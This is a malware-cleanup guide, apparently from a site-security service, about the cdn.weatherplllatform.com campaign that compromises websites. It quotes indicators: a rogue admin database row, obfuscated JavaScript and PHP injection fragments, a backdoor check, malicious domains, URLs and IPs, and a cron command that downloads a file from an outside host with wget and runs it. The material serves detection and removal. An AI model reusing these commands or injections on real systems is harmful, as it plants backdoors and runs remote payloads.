How to Remove cdn.weatherplllatform.com Malware

If your website is currently affected by cdn.weatherplllatform.com, most likely some of the local files are contaminated.
Today, after cleaning a website affected by this exact type of malware, I found out the following:

Think your website is infected?
Try our Free site check.

Quick steps:

  • Disable public access on the server & check other neighbor sites;
  • Perform a backup for each website;
  • Clean the sites manually, one by one, or purchase a cleanup plan;
  • If your hosting account holds more than 2 sites, consider better hosting to prevent cross-site contamination;
  • Apply updates & make sure all the site components are up to date & secure; and
  • Monitor the sites to notice any unusual behavior;

1. Malicious users with administrator privileges;

itsme','$P$BqPKFgMTAdxmIvuLuC8iBtt2okVOLY/','itsme','[email protected]','','2020-04-21 06:42:46','',0,'itsme

2. Infected Javascript files;

eval(String.fromCharCode(118,97,....,32,125/*spectrepoint*/));

3. PHP files with injected malicious code;

?php $PDvCBkdAp='y(3;]whcx)8$4mb dk1qog5sprlua

4. Malicious cronjobs added via cPanel interface, xxxd file execution;

wget -q -O xxxd http://hello.hellodolly777.xyz/xxxd && chmod 0755 xxxd && /bin/sh xxxd /home/.../public_html 24 && rm -f xxxd

5. Backdoor files installed in random locations.

if (isset($_HEADERS['Authorization']))

Malicious URLs:
https://verify.weatherplllatform.com
https://record.findtrustclicks.com/state.js
https://go.weatherplllatform.com/track.php
https://news.weatherplllatform.com/counters.js?v=11.23
https://news.weatherplllatform.com/counter.js
https://news.weatherplllatform.com/stat.js?v=0.4.4444
https://main.weatherplllatform.com/cdn.js?v=1.3.9
https://go.weatherplllatform.com/fly/follow.js?v=3.7.3
https://main.weatherplllatform.com/webcdn.js?v=5.3.5
https://go.weatherplllatform.com/fly.php
https://pertiolanrokemi.tk/help/?23071650902120
https://cdn.weatherplllatform.com/events.js?v=2.141
https://cdn.weatherplllatform.com/result.js?v=000
https://away.bettershitecolumn.com/hit.php?a=1311&b=334-1166-567334-46
cdn.weatherplllatform[.]com/event.js?v=3.33
https://cdn.weatherplllatform.com/base.js?v=5.41

https://away.bettershitecolumn.com/speak.php?q=1311&w=334-1166-567334-46
https://away.cdnbestplatform.com/go.php?id=3245467-34-56736-11
https://walk.cdnbestplatform.com/jVMC9H

Malicious files injected or added: index.php, wp-story.php, wp-static.php.

Need help? Let us clean your site.

Malicious domains: 0.blueskymotions.net, 0.blueskymotions.com, greenskymotions.net, pertiolanrokemi.tk, 0.trackspecialsdomain.com, 0.trackspecialdomain.com, simple.cofounderspecials.com, scripts.cofounderspecials.com, weatherplllatform.com, bettershitecolumn.com, goldflowerservice.net, cawanmyoropurka.gq ( Cloudflare ), bluewellabs.live, broworker4s.com.

Malicious IPs: 95.216.10.178, 45.9.148.27, 194.135.30.42, 141.95.174.47, 91.211.91.114, 185.177.94.108, 91.211.91.104, 89.22.228.250.

Cloudflare nameservers:
olivia.ns.cloudflare.com
rayden.ns.cloudflare.com

String.fromCharCode:
104,116,116,112,115,58,47,47,110,101,119,115,46,119,101,97,116,104,101,114,112,108,108,108,97,116,102,111,114,109,46,99,111,109,47,99,111,117,110,116,101,114,115,46,106,115,63,118,61,49,49,46,50,51
104,116,116,112,115,58,47,47,99,100,110,46,119,101,97,116,104,101,114,112,108,108,108,97,116,102,111,114,109,46,99,111,109,47,101,118,101,110,116,115,46,106,115,63,118,61,48,46,49,56,56
104, 116, 116, 112, 115, 58, 47, 47, 97, 119, 97, 121, 46, 98, 101, 116, 116, 101, 114, 115, 104, 105, 116, 101, 99, 111, 108, 117, 109, 110, 46, 99, 111, 109, 47, 115, 112, 101, 97, 107, 46, 112, 104, 112, 63, 113, 61, 49, 51, 49, 49, 38, 119, 61, 51, 51, 52, 45, 49, 49, 54, 54, 45, 53, 54, 55, 51, 51, 52, 45, 52, 54
104,116,116,112,115,58,47,47,99,100,110,46,119,101,97,116,104,101,114,112,108,108,108,97,116,102,111,114,109,46,99,111,109,47,114,101,115,117,108,116,46,106,115,63,118,61,48,48,48

More:

Sample message delivered after the visitors are redirected:
“Today, 26 September 2022, you have been randomly selected to take this survey. It will only take a minute and you will receive an amazing prize: Apple iPhone 13 Pro!”
“Like every Monday, we offer amazing prizes to 10 users. Today’s prize is an Apple iPhone 13 Pro! Only 10 lucky users living in United States will be the winners!
This survey is conducted to improve the services provided to our users, and your participation will be 100% rewarded!
Hurry up, the prizes are limited!”

Previous cleanup guide:
https://guides.magefix.com/2022/09/away-bettershitecolumn-com/